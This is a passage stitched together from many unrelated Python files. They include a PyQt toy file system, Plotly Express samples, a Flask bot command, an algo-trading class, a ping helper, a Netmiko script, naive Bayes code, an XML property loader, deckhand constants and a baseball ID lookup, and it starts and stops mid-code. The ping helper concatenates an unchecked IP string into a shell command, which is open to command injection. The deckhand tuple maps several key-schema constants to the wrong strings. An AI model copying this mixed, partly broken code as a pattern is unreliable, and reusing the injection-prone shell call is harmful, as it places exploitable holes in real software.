originText) if ok: length = len(text) if len(text) % 16 ==0: pass else: length = math.floor(length/16 + 1) * 16 if length > self.storageRemain: pass # else: self.storageRemain -= length blockPointer = self.FAT_Bitmap_list[selectedFile[1]] for i in range(round(length/16)): blockPointer.str = text[i*16:(i+1)*16] if i == (round(length/16)-1): break for j in range(len(self.FAT_Bitmap_list)): if len(self.FAT_Bitmap_list[j].str) == 0: # empty blockPointer.next = j blockPointer = self.FAT_Bitmap_list[j] break self.refreshUI() else: pass else: # dir for child in self.pointer.son: if child.dirName == self.selectBtn.text()[0:11].replace(' ', ''): # text need to add slice !!! self.pointer = child self.currentPath = self.currentPath + '/' + child.dirName self.refreshUI() break def getTextFileSize(self, startBlockNum): size = 0 blockPointer = self.FAT_Bitmap_list[startBlockNum] while True: if blockPointer.next == -1: if len(blockPointer.str) == 0: # empty break else: size += 16 break else: size += 16 blockPointer = self.FAT_Bitmap_list[blockPointer.next] return size def releaseTextFile(self, startBlockNum): blockPointer = self.FAT_Bitmap_list[startBlockNum] while True: if blockPointer.next == -1: if len(blockPointer.str) == 0: # empty break else: blockPointer.str = '' self.storageRemain += 16 break else: self.storageRemain += 16 blockPointer.str = '' tmp = blockPointer.next blockPointer.next = -1 blockPointer = self.FAT_Bitmap_list[tmp] def deleteFileAction(self): # Action in popMenu if self.ROOT == '': QMessageBox.information(self, 'Warning', '请先选择工作目录!') else: if '.txt' in self.selectBtn.text(): selectedFile = '' for file in self.pointer.fileList: if file[0] == self.selectBtn.text()[0:11].replace(' ', ''): # remember to parse filename selectedFile = file break self.releaseTextFile(selectedFile[1]) self.pointer.fileList.remove(selectedFile) self.refreshUI() else: for child in self.pointer.son: if child.dirName == self.selectBtn.text()[0:11].replace(' ', ''): # text need to add slice !!! # have to delete all files in that dir self.deleteDir(child) self.refreshUI() break def showPopMenu(self, pos): source = self.sender() self.selectBtn = source self.popMenu.exec_(source.mapToGlobal(pos)) def getText(self, selectedFile): string = '' i = selectedFile[1] while True: string += self.FAT_Bitmap_list[i].str i = self.FAT_Bitmap_list[i].next if i == -1: break return string def deleteDir(self, dirNode): for file in dirNode.fileList: self.releaseTextFile(file[1]) dirNode.fileList.clear() for child in dirNode.son: self.deleteDir(child) dirNode.son.clear() def writeIntoDisk(self): # write everything into disk when quiting this system, consider to rm -rf everything and write everything again if self.ROOT == '': QMessageBox.information(self, 'Warning', '请先选择工作目录!') else: for file in os.listdir(self.PATH): if '.' in file: os.remove(os.path.join(self.PATH, file)) else: shutil.rmtree(os.path.join(self.PATH, file)) with open(os.path.join(self.PATH, '.FAT_BitMap_list'), 'w') as f: for block in self.FAT_Bitmap_list: f.write(str(block.next) + ' ' + block.str + '\n') self.writeEveryDir(self.ROOT, self.PATH) sys.exit() def writeEveryDir(self, dirNode, path): with open(os.path.join(path, '.index'), 'w') as f: for file in dirNode.fileList: f.write(file[0] + ' ' + str(file[1]) + '\n') for file in dirNode.fileList: text = self.getText(file) with open(os.path.join(path, file[0]), 'w') as f: f.write(text) for child in dirNode.son: os.mkdir(os.path.join(path, child.dirName)) self.writeEveryDir(child, os.path.join(path, child.dirName)) if __name__ == '__main__': app = QApplication(sys.argv) ex = FileManagement() sys.exit(app.exec_())"""Plotly Express Examples.""" # TODO: Migrate this sample code to ex_app_px.py import plotly.express as px print(px.__version__) tips = px.data.tips() # total_bill tip sex smoker day time size # 0 16.99 1.01 Female No Sun Dinner 2 # 1 10.34 1.66 Male No Sun Dinner 3 # .. ... ... ... ... ... ... ... # 242 17.82 1.75 Male No Sat Dinner 2 # 243 18.78 3.00 Female No Thur Dinner 2 # [244 rows x 7 columns] iris = px.data.iris() # sepal_length sepal_width petal_length petal_width species species_id # 0 5.1 3.5 1.4 0.2 setosa 1 # 1 4.9 3.0 1.4 0.2 setosa 1 # .. ... ... ... ... ... ... # 148 6.2 3.4 5.4 2.3 virginica 3 # 149 5.9 3.0 5.1 1.8 virginica 3 # [150 rows x 6 columns] gapminder = px.data.gapminder() # country continent year lifeExp pop gdpPercap iso_alpha iso_num # 0 Afghanistan Asia 1952 28.801 8425333 779.445314 AFG 4 # 1 Afghanistan Asia 1957 30.332 9240934 820.853030 AFG 4 # ... ... ... ... ... ... ... ... ... # 1702 Zimbabwe Africa 2002 39.989 11926563 672.038623 ZWE 716 # 1703 Zimbabwe Africa 2007 43.487 12311143 469.709298 ZWE 716 # [1704 rows x 8 columns] election = px.data.election() # district Coderre Bergeron Joly total winner result district_id # 0 101-Bois-de-Liesse 2481 1829 3024 7334 Joly plurality 101 # 1 102-Cap-Saint-Jacques 2525 1163 2675 6363 Joly plurality 102 # ... ... ... ... ... ... ... ... ... # 56 93-Robert-Bourassa 446 465 419 1330 Bergeron plurality 93 # 57 94-Jeanne-Sauvé 491 698 489 1678 Bergeron plurality 94 # # [58 rows x 8 columns] wind = px.data.wind() # direction strength frequency # 0 N 0-1 0.5 # 1 NNE 0-1 0.6 # .. ... ... ... # 126 NW 6+ 1.5 # 127 NNW 6+ 0.2 # [128 rows x 3 columns] carshare = px.data.carshare() # centroid_lat centroid_lon car_hours peak_hour # 0 45.471549 -73.588684 1772.750000 2 # 1 45.543865 -73.562456 986.333333 23 # .. ... ... ... ... # 247 45.521199 -73.581789 1044.833333 17 # 248 45.532564 -73.567535 694.916667 5 # [249 rows x 4 columns] # See explanation with: `print(px.data.iris.__doc__)` # Possible argument combinations px.scatter( iris, x='sepal_width', y='sepal_length', color='species', marginal_y='violin', marginal_x='box', trendline='ols', ) px.scatter(iris, x='sepal_width', y='sepal_length', color='species', marginal_y='rug', marginal_x='histogram') px.scatter( tips, x='total_bill', y='tip', facet_row='time', facet_col='day', color='smoker', trendline='ols', category_orders={'day': ['Thur', 'Fri', 'Sat', 'Sun'], 'time': ['Lunch', 'Dinner']}, ) iris['e'] = iris['sepal_width'] / 100 px.scatter(iris, x='sepal_width', y='sepal_length', color='species', error_x='e', error_y='e') del iris['e'] # Animations! px.scatter( gapminder.query('year==2007'), x='gdpPercap', y='lifeExp', size='pop', color='continent', hover_name='country', log_x=True, size_max=60, ) px.scatter( gapminder, x='gdpPercap', y='lifeExp', animation_frame='year', animation_group='country', size='pop', color='continent', hover_name='country', facet_col='continent', log_x=True, size_max=45, range_x=[100, 100000], range_y=[25, 90], ) # Example of each chart type px.scatter_matrix(iris, dimensions=['sepal_width', 'sepal_length', 'petal_width', 'petal_length'], color='species') px.parallel_coordinates( iris, color='species_id', labels={ 'species_id': 'Species', 'sepal_width': 'Sepal Width', 'sepal_length': 'Sepal Length', 'petal_width': 'Petal Width', 'petal_length': 'Petal Length', }, color_continuous_scale=px.colors.diverging.Tealrose, color_continuous_midpoint=2, ) px.parallel_categories(tips, color='size', color_continuous_scale=px.colors.sequential.Inferno) px.line( gapminder, x='year', y='lifeExp', color='continent', line_group='country', hover_name='country', line_shape='spline', render_mode='svg', ) px.area(gapminder, x='year', y='pop', color='continent', line_group='country') px.density_contour(iris, x='sepal_width', y='sepal_length', color='species', marginal_x='rug', marginal_y='histogram') px.density_heatmap(iris, x='sepal_width', y='sepal_length', marginal_x='rug', marginal_y='histogram') px.bar(tips, x='sex', y='total_bill', color='smoker', barmode='group') px.bar( tips, x='sex', y='total_bill', color='smoker', barmode='group', facet_row='time', facet_col='day', category_orders={'day': ['Thur', 'Fri', 'Sat', 'Sun'], 'time': ['Lunch', 'Dinner']}, ) px.histogram(tips, x='total_bill', y='tip', color='sex', marginal='rug', hover_data=tips.columns) px.histogram( tips, x='sex', y='tip', histfunc='avg', color='smoker', barmode='group', facet_row='time', facet_col='day', category_orders={ 'day': ['Thur', 'Fri', 'Sat', 'Sun'], 'time': ['Lunch', 'Dinner'], }, ) px.strip(tips, x='total_bill', y='time', orientation='h', color='smoker') px.box(tips, x='day', y='total_bill', color='smoker', notched=True) px.violin(tips, y='tip', x='smoker', color='sex', box=True, points='all', hover_data=tips.columns) px.scatter_ternary( election, a='Joly', b='Coderre', c='Bergeron', color='winner', size='total', hover_name='district', size_max=15, color_discrete_map={'Joly': 'blue', 'Bergeron': 'green', 'Coderre': 'red'}, ) px.line_ternary(election, a='Joly', b='Coderre', c='Bergeron', color='winner', line_dash='winner') px.scatter_polar( wind, r='value', theta='direction', color='strength', symbol='strength', color_discrete_sequence=px.colors.sequential.Plotly[-2::-1], ) px.line_polar( wind, r='value', theta='direction', color='strength', line_close=True, color_discrete_sequence=px.colors.sequential.Plotly[-2::-1], ) px.bar_polar( wind, r='value', theta='direction', color='strength', # template='plotly_dark', color_discrete_sequence=px.colors.sequential.Plotly[-2::-1], ) # # Maps, need Mapbox token # px.set_mapbox_access_token(open('.mapbox_token').read()) # px.scatter_mapbox(carshare, lat='centroid_lat', lon='centroid_lon', color='peak_hour', size='car_hours', # color_continuous_scale=px.colors.cyclical.IceFire, size_max=15, zoom=10) # Color swatches px.colors.qualitative.swatches() px.colors.sequential.swatches() px.colors.diverging.swatches() px.colors.cyclical.swatches() px.colors.colorbrewer.swatches() px.colors.cmocean.swatches() px.colors.carto.swatches() from flask import current_app as app from app import command_system from app.scheduledb import ScheduleDB from app.messages import (registration_success_message, registration_alt_help_message, error_message) # Статистика from app.statistic import track def registration_alt(uid, key, data=''): # Статистика track(app.config['STATISTIC_TOKEN'], uid, data, 'registration_alt') if data == '': return registration_alt_help_message, '', '' try: with ScheduleDB(app.config) as db: organizations = db.get_similar_organizations(data) if len(organizations) != 0: message = registration_success_message if organizations[0][2] > 0.8: message += '\n\nВы зарегистрированны в: {}'.format(organizations[0][1]) else: message += '\n\nВы зарегистрированны в наиболее совпадающей с запросом группе: {}\n' \ '-----\nДругие похожие:\n'.format(organizations[0][1]) for org in organizations: message += "{}\n".format(org[1]) with ScheduleDB(app.config) as db: user = db.find_user(uid) if user: db.update_user(uid, " ", " ", organizations[0][0]) else: db.add_user(uid, " ", " ", organizations[0][0]) return message, '', '' else: return error_message, '', '' except BaseException as e: app.logger.warning('registration_alt: {}'.format(str(e))) return error_message, '', '' registration_command = command_system.Command() registration_command.keys = ['reg', ] registration_command.description = 'Альтернативная команда для регистрации в текстовом режиме' registration_command.process = registration_alt """Contains factories related to processes.""" import os import re def read_BLEU4(file_path): last_line = None with open(file_path, 'r') as f: last_line = f.readlines()[-1] target = re.search(r'BLEU4 = (.*?), ', last_line) #print(target.group(1)) target = target.group(1) return float(target) if __name__ == "__main__": file_path = "/mnt/xiangxin2/data/wmt14/checkpoints/top-2L-layerdrop-0.3_6L/checkpoint_best/generate-valid.txt" print(read_BLEU4(file_path)) FutuAlgo/algo.py0 from account import Account from execution import Execution from FutuAlgo import logger from strategy import Strategy from data import Data from web import AlgoApp from tools import * import pickle import asyncio import time class Algo(Strategy): """ Class that ensemble Account, Strategy, Data and AlgoWeb to run algo trading """ def __init__(self, name: str, log_path='.', benchmark: str = 'HSI'): self.name = name self.benchmark = benchmark self._logger = logger.RootLogger(root_name=self.name, file_path=log_path) self._running = False self._initialized_date = None self._initialized = False self._data = None self._account = None self._execution=None self._webapp = None @try_expt(msg='Initialization Failed', pnt_original=True) def initialize(self, initial_capital: float, mq_ip: str, hook_ip: str, trading_environment: str, trading_universe: list, datatypes: list, txn_cost: float = 30, cache_rows: int = 3000, test_mq_con=True, hook_name: str = 'FUTU', prefill_period='1Y', **kwargs): assert trading_environment in ('BACKTEST', 'SIMULATE', 'REAL'), f'Invalid trading environment {trading_environment}' assert initial_capital > 0, 'Initial Capital cannot be 0' assert cache_rows > 1, 'No of cached data must be > 0 rows' self._account = Account(logger=self._logger, initial_capital=initial_capital, txn_cost=txn_cost) self._data = Data(mq_ip=mq_ip, logger=self._logger, hook_ip=hook_ip, trading_universe=trading_universe, datatypes=datatypes, cache_rows=cache_rows, test_mq_con=test_mq_con, hook_name=hook_name, prefill_period=prefill_period, add_pos_func=self._account.add_new_position) self._execution = Execution(account=self._account, data=self._data, trading_environment=trading_environment, logger=self._logger) self._webapp = AlgoApp(algo=self) self._initialized_date = datetime.datetime.today() self._running = False self._logger.debug('Initialized sucessfully.') self._initialized = True async def record_daily_performance(self): while True: self._account.log() await asyncio.sleep(60 * 60 * 24 - time.time() % 60 * 60 * 24) async def main(self): self._running = True self._data.start_sub() self._logger.debug(f'Algo {self.name} is running successfully!') while True: try: topic, bin_df = await self._data.receive_data() if not self._running: continue topic_split = topic.decode('ascii').split('.') datatype = topic_split[1] key = '.'.join(topic_split[2:]) df = pickle.loads(bin_df) if datatype == 'ORDER_UPDATE': self._account.update_positions(df) await self.on_order_update(order_id=key, df=df) else: self._account.update_prices(datatype=datatype, df=df) self._data.add_cache(datatype=datatype, df=df, ticker=key) trigger_strat, (tgr_dtype, tgr_ticker, tgr_df) = self.determine_trigger(datatype=datatype, ticker=key, df=df) if trigger_strat: await self.trigger_strat(datatype=tgr_dtype, ticker=tgr_ticker, df=tgr_df) except Exception as e: self._running = False self._logger.error(f'Exception occur, Algo stopped due to {str(e)}') def run(self, sanic_port, sanic_host='127.0.0.1'): if not self._initialized: self._logger.debug('Algo not initialized') else: loop = asyncio.get_event_loop() async def _run(): tasks = list() web_server = self._webapp.get_coroutine(host=sanic_host, port=sanic_port) tasks.append(web_server) tasks.append(self.main()) tasks.append(self.record_daily_performance()) await asyncio.gather(*tasks) loop.create_task(_run()) loop.run_forever() # ------------------------------------------------ [ Trade API ] ------------------------------------------ def trade(self): pass def buy_market(self, ticker, quantity): return self._execution.buy_market(ticker=ticker, quantity=quantity) def sell_market(self, ticker, quantity): return self._execution.sell_market(ticker=ticker, quantity=quantity) def buy_limit(self, ticker, quantity, price): return self._execution.buy_limit(ticker=ticker, quantity=quantity, price=price) def sell_limit(self, ticker, quantity, price): return self._execution.sell_limit(ticker=ticker, quantity=quantity, price=price) # ------------------------------------------------ [ Get Set ] ------------------------------------------ def get_data(self, datatype, ticker: str, start_date: datetime.datetime = None, n_rows: int = None, sort_drop=True): return self._data.get_data(datatype=datatype, ticker=ticker, start_date=start_date, n_rows=n_rows, sort_drop=sort_drop) def get_current_qty(self, ticker): return self._account.get_current_qty(ticker=ticker) def get_latest_price(self, ticker): return self._account.get_latest_price(ticker=ticker) def get_lot_size(self, ticker): return self._data.get_lot_size(ticker=ticker) def calc_max_buy_qty(self, ticker, cash=None, adjust_limit=1.03): lot_size = self.get_lot_size(ticker=ticker) return self._account.calc_max_buy_qty(ticker=ticker, lot_size=lot_size, cash=cash, adjust_limit=adjust_limit) def subscribe_tickers(self, tickers): self._data.subscribe_tickers(tickers=tickers) def unsubscribe_tickers(self, tickers): self._data.unsubscribe_tickers(tickers=tickers) def pause(self): self._running = False def resume(self): self._running = True @property def cash(self): return self._account.cash @property def mv(self): return self._account.mv @property def pv(self): return self._account.pv @property def n_trades(self): return self._account.n_trades @property def init_capital(self): return self._account.init_capital @property def total_txn_cost(self): return self._account.total_txn_cost @property def initialized_date(self): return self._initialized_date @property def running(self): return self._running @property def records(self): return self._account.records @property def pending_orders(self): return self._account.pending_orders @property def completed_orders(self): return self._account.completed_orders @property def positions(self): return self._account.positions @property def universe(self): return self._data.unverse @property def datatypes(self): return self._data.datatypes @property def initialized(self): return self._initialized if __name__ == '__main__': pass 1-10 guess = 1 while True: num = input("Please guess the number (between 0-100): ") try: num = int(num) except: print("Invalid number, please quess again.") continue if num < 45: print("Your guess was under.") elif num > 45: print("Your guess was over.") else: break guess += 1 print(f"You guessed it in {guess} guesses") vps/dg/icmp_test.py import time import subprocess def shend_icmp_packet(ip_address,times): try: response = subprocess.getstatusoutput('ping -c ' + times + ' '+ ip_address) response = response[1] # 取出丢包率 lost = response[response.index("ved,"):response.index("%")] #取出指定的延时字符串 res = list(response) index = 0 count = 0 for r in res: count += 1 if r == "=" : index = count response = response[index + 1:-4] # 取出执行的延迟 i = 0 j = [] res1 = list(response) for r in res1: i += 1 if r == "/" : j.append(i) min = response[:j[0]-1] avg = response[j[0]:j[1]-1] max = response[j[1]:j[2]-1] return min,avg,max,lost except : print("ping exec error") file = open("icmp_logs.txt","a") file.write(time.asctime(time.localtime(time.time())) +" ping exec error \n") file.close() netmiko/exercise7.py # Add same configuration to all Nexus switches from netmiko import ConnectHandler # Devices to SSH into devices = [ { "device_type": "cisco_nxos", "ip": "sbx-nxos-mgmt.cisco.com", "username": "admin", "password": "!", "port": 8181, "fast_cli": False, "session_log": "nxos-exercise7.log", } ] # Loop through devices for device in devices: # Create a connection instance with ConnectHandler(**device) as net_connect: # Parse hostname of the device hostname = net_connect.send_command( command_string="show hostname", use_textfsm=True )[0]["hostname"] # Send config from text file (or Use ex5-config.txt) output = net_connect.send_config_from_file(config_file="ex7-config.txt") # And save configuration output += net_connect.save_config() # Parse the new running configuration run_cfg = net_connect.send_command(command_string="show running-config") # Export the new running-config of each device to a text file with open(file=f"{hostname}-run_cfg-ex7.txt", mode="w") as outfile: outfile.write(run_cfg.lstrip()) print("Done") from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import six import os import os.path as osp import copy from ast import literal_eval import numpy as np from packaging import version import torch import torch.nn as nn from torch.nn import init import yaml from easydict import EasyDict as AttrDict __C = AttrDict() cfg = __C __C.DEBUG = False __C.CACHE_DIR = osp.abspath(osp.join(osp.dirname(__file__),'./cache')) __C.COCO_API_HOME = '/media/yelyu/18339a64-762e-4258-a609-c0851cd8163e/YeLyu/Dataset/MSCOCO/PythonAPI' # ---------------------------------------------------------------------------- # # DAVIS # ---------------------------------------------------------------------------- # #directory contains davis api tools. __C.DAVIS = AttrDict() __C.DAVIS.HOME = '/media/yelyu/18339a64-762e-4258-a609-c0851cd8163e/YeLyu/Dataset/DAVIS/davis-2017' __C.DAVIS.FLOW_DIR = '/media/yelyu/18339a64-762e-4258-a609-c0851cd8163e/YeLyu/Opensrc_proj/LiteFlowNet/models/testing/davis_flow_backward' __C.DAVIS.FLOW_INV_DIR = '/media/yelyu/18339a64-762e-4258-a609-c0851cd8163e/YeLyu/Opensrc_proj/LiteFlowNet/models/testing/davis_flow_forward' __C.DAVIS.FLOW_FILENAME_TEMPLATE = 'liteflownet-%07d.flo' # ---------------------------------------------------------------------------- # # SegTrack v2 # ---------------------------------------------------------------------------- # __C.SegTrack_v2 = AttrDict() __C.SegTrack_v2.HOME = '/media/yelyu/18339a64-762e-4258-a609-c0851cd8163e/YeLyu/Dataset/SegTrackv2' __C.SegTrack_v2.FLOW_DIR = None __C.SegTrack_v2.FLOW_INV_DIR = None __C.SegTrack_v2.FLOW_FILENAME_TEMPLATE = 'liteflownet-%07d.flo'# ЗАЯВА ПРО звуження переліку МПД def test_22_lims_test_case_3_4(app): app.session.login(password='', path_to_key='C:/') app.second_application.create_import_fourth_application() app.second_application.delete_mpd_import_fourth() app.second_application.completeness_check_import_fourth() app.second_application.notifications_and_license_terms_import_fourth(comment='Коментар тест') app.second_application.submit_application_import_fourth(path_to_key='', password='') app.session.logout() DaoyiG/aima-python """Learning probabilistic models. (Chapters 20)""" import heapq from utils import weighted_sampler, product, gaussian class CountingProbDist: """ A probability distribution formed by observing and counting examples. If p is an instance of this class and o is an observed value, then there are 3 main operations: p.add(o) increments the count for observation o by 1. p.sample() returns a random element from the distribution. p[o] returns the probability for o (as in a regular ProbDist). """ def __init__(self, observations=None, default=0): """ Create a distribution, and optionally add in some observations. By default this is an unsmoothed distribution, but saying default=1, for example, gives you add-one smoothing. """ if observations is None: observations = [] self.dictionary = {} self.n_obs = 0 self.default = default self.sampler = None for o in observations: self.add(o) def add(self, o): """Add an observation o to the distribution.""" self.smooth_for(o) self.dictionary[o] += 1 self.n_obs += 1 self.sampler = None def smooth_for(self, o): """ Include o among the possible observations, whether or not it's been observed yet. """ if o not in self.dictionary: self.dictionary[o] = self.default self.n_obs += self.default self.sampler = None def __getitem__(self, item): """Return an estimate of the probability of item.""" self.smooth_for(item) return self.dictionary[item] / self.n_obs # (top() and sample() are not used in this module, but elsewhere.) def top(self, n): """Return (count, obs) tuples for the n most frequent observations.""" return heapq.nlargest(n, [(v, k) for (k, v) in self.dictionary.items()]) def sample(self): """Return a random sample from the distribution.""" if self.sampler is None: self.sampler = weighted_sampler(list(self.dictionary.keys()), list(self.dictionary.values())) return self.sampler() def NaiveBayesLearner(dataset, continuous=True, simple=False): if simple: return NaiveBayesSimple(dataset) if continuous: return NaiveBayesContinuous(dataset) else: return NaiveBayesDiscrete(dataset) def NaiveBayesSimple(distribution): """ A simple naive bayes classifier that takes as input a dictionary of CountingProbDist objects and classifies items according to these distributions. The input dictionary is in the following form: (ClassName, ClassProb): CountingProbDist """ target_dist = {c_name: prob for c_name, prob in distribution.keys()} attr_dists = {c_name: count_prob for (c_name, _), count_prob in distribution.items()} def predict(example): """Predict the target value for example. Calculate probabilities for each class and pick the max.""" def class_probability(target_val): attr_dist = attr_dists[target_val] return target_dist[target_val] * product(attr_dist[a] for a in example) return max(target_dist.keys(), key=class_probability) return predict def NaiveBayesDiscrete(dataset): """ Just count how many times each value of each input attribute occurs, conditional on the target value. Count the different target values too. """ target_vals = dataset.values[dataset.target] target_dist = CountingProbDist(target_vals) attr_dists = {(gv, attr): CountingProbDist(dataset.values[attr]) for gv in target_vals for attr in dataset.inputs} for example in dataset.examples: target_val = example[dataset.target] target_dist.add(target_val) for attr in dataset.inputs: attr_dists[target_val, attr].add(example[attr]) def predict(example): """ Predict the target value for example. Consider each possible value, and pick the most likely by looking at each attribute independently. """ def class_probability(target_val): return (target_dist[target_val] * product(attr_dists[target_val, attr][example[attr]] for attr in dataset.inputs)) return max(target_vals, key=class_probability) return predict def NaiveBayesContinuous(dataset): """ Count how many times each target value occurs. Also, find the means and deviations of input attribute values for each target value. """ means, deviations = dataset.find_means_and_deviations() target_vals = dataset.values[dataset.target] target_dist = CountingProbDist(target_vals) def predict(example): """Predict the target value for example. Consider each possible value, and pick the most likely by looking at each attribute independently.""" def class_probability(target_val): prob = target_dist[target_val] for attr in dataset.inputs: prob *= gaussian(means[target_val][attr], deviations[target_val][attr], example[attr]) return prob return max(target_vals, key=class_probability) return predict FGDATA/aura-props # TODO: properly handle enumerated nodes import os.path import sys #import xml.etree.ElementTree as ET import lxml.etree as ET from props import PropertyNode, root # internal xml tree parsing routine def _parseXML(pynode, xmlnode, basepath): overlay = 'overlay' in xmlnode.attrib exists = xmlnode.tag in pynode.__dict__ if len(xmlnode) or 'include' in xmlnode.attrib: # has children newnode = PropertyNode() if 'include' in xmlnode.attrib: filename = basepath + '/' + xmlnode.attrib['include'] print "calling load():", filename, xmlnode.attrib load(filename, newnode) if 'n' in xmlnode.attrib: # enumerated node n = int(xmlnode.attrib['n']) if not exists: pynode.__dict__[xmlnode.tag] = [] elif not type(pynode.__dict__[xmlnode.tag]) is list: savenode = pynode.__dict__[xmlnode.tag] pynode.__dict__[xmlnode.tag] = [ savenode ] tmp = pynode.__dict__[xmlnode.tag] pynode.extendEnumeratedNode(tmp, n) pynode.__dict__[xmlnode.tag][n] = newnode elif exists: if not overlay: # append # print "node exists:", xmlnode.tag, "overlay:", overlay if not type(pynode.__dict__[xmlnode.tag]) is list: # we need to convert this to an enumerated list print "converting node to enumerated:", xmlnode.tag savenode = pynode.__dict__[xmlnode.tag] pynode.__dict__[xmlnode.tag] = [ savenode ] pynode.__dict__[xmlnode.tag].append(newnode) else: # overlay (follow existing tree) newnode = pynode.__dict__[xmlnode.tag] else: # create new node pynode.__dict__[xmlnode.tag] = newnode for child in xmlnode: _parseXML(newnode, child, basepath) else: # leaf value = xmlnode.text if 'type' in xmlnode.attrib: if xmlnode.attrib['type'] == 'bool': print xmlnode.tag, "is bool" if value == '0' or value == 'false' or value == '': value = False else: value = True if 'n' in xmlnode.attrib: # enumerated node n = int(xmlnode.attrib['n']) if not exists: pynode.__dict__[xmlnode.tag] = [] elif not type(pynode.__dict__[xmlnode.tag]) is list: savenode = pynode.__dict__[xmlnode.tag] pynode.__dict__[xmlnode.tag] = [ savenode ] tmp = pynode.__dict__[xmlnode.tag] pynode.extendEnumeratedLeaf(tmp, n, "") pynode.__dict__[xmlnode.tag][n] = value # print "leaf:", xmlnode.tag, value, xmlnode.attrib elif exists: if not overlay: # append if not type(pynode.__dict__[xmlnode.tag]) is list: # convert to enumerated. print "converting node to enumerated" savenode = pynode.__dict__[xmlnode.tag] pynode.__dict__[xmlnode.tag] = [ savenode ] pynode.__dict__[xmlnode.tag].append(value) else: # overwrite pynode.__dict__[xmlnode.tag] = value elif type(xmlnode.tag) is str: pynode.__dict__[xmlnode.tag] = value else: # print "Skipping unknown node:", xmlnode.tag, ":", value pass # load xml file and create a property tree rooted at the given node # supports def load(filename, pynode): try: xml = ET.parse(filename) except: print filename + ": xml parse error:\n" + str(sys.exc_info()[1]) return False path = os.path.dirname(filename) print "path:", path xmlroot = xml.getroot() for child in xmlroot: _parseXML(pynode, child, path) return True def _buildXML(xmlnode, pynode): for child in pynode.__dict__: node = pynode.__dict__[child] if isinstance(node, PropertyNode): xmlchild = ET.Element(child) xmlnode.append(xmlchild) _buildXML(xmlchild, node) elif type(node) is list: for i, ele in enumerate(node): if isinstance(ele, PropertyNode): xmlchild = ET.Element(child) # print "attrib n =", i xmlchild.attrib['n'] = str(i) xmlnode.append(xmlchild) _buildXML(xmlchild, ele) else: xmlchild = ET.Element(child) xmlchild.attrib['n'] = str(i) xmlchild.text = str(ele) xmlnode.append(xmlchild) elif type(child) is str or type(child) is unicode: xmlchild = ET.Element(child) xmlchild.text = str(node) xmlnode.append(xmlchild) else: print "xml build skipping:", child, ":", str(node) # save the property tree starting at pynode into an xml file. def save(filename, pynode=root): xmlroot = ET.Element('PropertyList') xml = ET.ElementTree(xmlroot) _buildXML(xmlroot, pynode) try: xml.write(filename, encoding="us-ascii", xml_declaration=False, pretty_print=True) except: print filename + ": xml write error:\n" + str(sys.exc_info()[1]) return deckhand/types.py # Copyright 2017 AT&T Intellectual Property. All other rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. DOCUMENT_SECRET_TYPES = ( CERTIFICATE_AUTHORITY_SCHEMA, CERTIFICATE_KEY_AUTHORITY_SCHEMA, CERTIFICATE_KEY_SCHEMA, CERTIFICATE_SCHEMA, PRIVATE_KEY_SCHEMA, PUBLIC_KEY_SCHEMA, PASSPHRASE_SCHEMA ) = ( 'deckhand/CertificateAuthority', 'deckhand/CertificateAuthorityKey', 'deckhand/Certificate', 'deckhand/CertificateKey', 'deckhand/Passphrase', 'deckhand/PrivateKey', 'deckhand/PublicKey', ) DOCUMENT_SCHEMA_TYPES = ( DATA_SCHEMA_SCHEMA, LAYERING_POLICY_SCHEMA, VALIDATION_POLICY_SCHEMA, ) = ( 'deckhand/DataSchema', 'deckhand/LayeringPolicy', 'deckhand/ValidationPolicy', ) DOCUMENT_SCHEMA_TYPES += DOCUMENT_SECRET_TYPES DECKHAND_VALIDATION_TYPES = ( DECKHAND_SCHEMA_VALIDATION, ) = ( 'deckhand-schema-validation', ) ENCRYPTION_TYPES = ( CLEARTEXT, ENCRYPTED ) = ( 'cleartext', 'encrypted', ) METADATA_SCHEMA_TYPES = ( CONTROL, DOCUMENT ) = ( 'metadata/Control', 'metadata/Document' ) import pandas as pd import requests import io # dropped key_uuid. looks like a has we wouldn't need for anything. # TODO: allow for typos. String similarity? def get_lookup_table(): print('Gathering player lookup table. This may take a moment.') url = "https://raw.githubusercontent.com/chadwickbureau/register/master/data/people.csv" s=requests.get(url).content table = pd.read_csv(io.StringIO(s.decode('utf-8')), dtype={'key_sr_nfl': object, 'key_sr_nba': object, 'key_sr_nhl': object}) #subset columns cols_to_keep = ['name_last','name_first','key_mlbam', 'key_retro', 'key_bbref', 'key_fangraphs', 'mlb_played_first','mlb_played_last'] table = table[cols_to_keep] #make these lowercase to avoid capitalization mistakes when searching table['name_last'] = table['name_last'].str.lower() table['name_first'] = table['name_first'].str.lower() # Pandas cannot handle NaNs in integer columns. We need IDs to be ints for successful queries in statcast, etc. # Workaround: replace ID NaNs with -1, then convert columns to integers. User will have to understand that -1 is not a valid ID. table[['key_mlbam', 'key_fangraphs']] = table[['key_mlbam', 'key_fangraphs']].fillna(-1) table[['key_mlbam', 'key_fangraphs']] = table[['key_mlbam', 'key_fangraphs']].astype(int) # originally returned as floats which is wrong return table def playerid_lookup(last=None, first=None, player_list=None): # force input strings to lowercase if last: last = last.lower() if first: first = first.lower() table = get_lookup_table() # if player_list has a value, then the user is passing in a list of players # the list of players may be comma delimited for last, first, or just last if player_list: player_counter = 1 for player in player_list: last = player.split(",")[0].strip() first = None if(len(player.split(",")) > 1): first = player.split(",")[1].strip() if(player_counter == 1): results = playerid_lookup(last, first) else: results = results.append(playerid_lookup(last, first), ignore_index = True) player_counter += 1 return results if first is None: results = table.loc[table['name_last']==last] else: results = table.loc[(table['name_last']==last) & (table['name_first']==first)] #results[['key_mlbam', 'key_fangraphs', 'mlb_played_first', 'mlb_played_last']] = results[['key_mlbam', 'key_fangraphs', 'mlb_played_first', 'mlb_played_last']].astype(int) # originally returned as floats which is wrong results = results.reset_index().drop('index', 1) return results # data = playerid_lookup('bonilla') # data = playerid_lookup('bonilla', 'bobby') def playerid_reverse_lookup(player_ids, key_type=None): """Retrieve a table of player information given a list of player ids :param player_ids: list of player ids :type player_ids: list :param key_type: name of the key type being looked up (one of "mlbam", "retro", "bbref", or "fangraphs") :type key_type: str :rtype: :class:`pandas.core.frame.DataFrame` """ key_types = ('mlbam', 'retro', 'bbref', 'fangraphs', ) if not key_type: key_type = key_types[0] # default is "mlbam" if key_type not provided elif key_type not in 